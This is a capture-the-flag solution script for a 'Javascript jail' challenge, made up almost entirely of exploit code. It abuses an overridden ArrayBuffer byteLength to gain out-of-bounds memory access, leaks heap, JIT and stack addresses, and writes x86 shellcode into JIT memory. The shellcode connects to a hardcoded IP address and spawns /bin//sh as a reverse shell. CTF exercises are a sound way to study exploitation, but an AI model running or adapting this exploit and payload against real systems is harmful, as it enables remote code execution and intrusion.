Yet another Javascript jail (300 points) solution

solve.js

offset = 155288;
shellcode = Array(400+1).join("\x90") + "\x6a\x66\x58\x99\x6a\x01\x5b\x52\x53\x6a\x02\x89\xe1\xcd\x80\x5b\x5d\xbe\xb4\x1a\x3a\x80\x56\x66\xbd\x5c\x11\x0f\xcd\x09\xdd\x55\x43\x6a\x10\x51\x50\xb0\x66\x89\xe1\xcd\x80\x87\xd9\x5b\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\xeb\xdf";

var ab4 = new ArrayBuffer(8);
ab4.__defineGetter__("byteLength", function() { return 0xFFFFFFFC; });
var aaaa = new Uint32Array(ab4);
heap = (aaaa[34586]-318224+0x6000) + offset // heap start address
JIT = aaaa[34108] // start address of one of the JIT fields
stack = aaaa[30677] // stack addr

print("heap:", heap.toString(16), "JIT:", JIT.toString(16), "stack:", stack.toString(16))
for (i=(JIT-heap)/4+100; i<(JIT-heap)/4+18+100; i++) {var i2 = i-((JIT - heap)/4); var sum=0; var l=shellcode.slice(i2*4, i2*4+4).split('').reverse(); for (j=0;j<4;j++) {sum += (l[j].charCodeAt(0) << (24 - j*8))};aaaa[i] = sum;print(i, aaaa[i].toString(16));}
for (i=(stack-heap)/4; i<(stack-heap)/4+0x2000; i++) aaaa[i] = JIT+400;
print("Gained")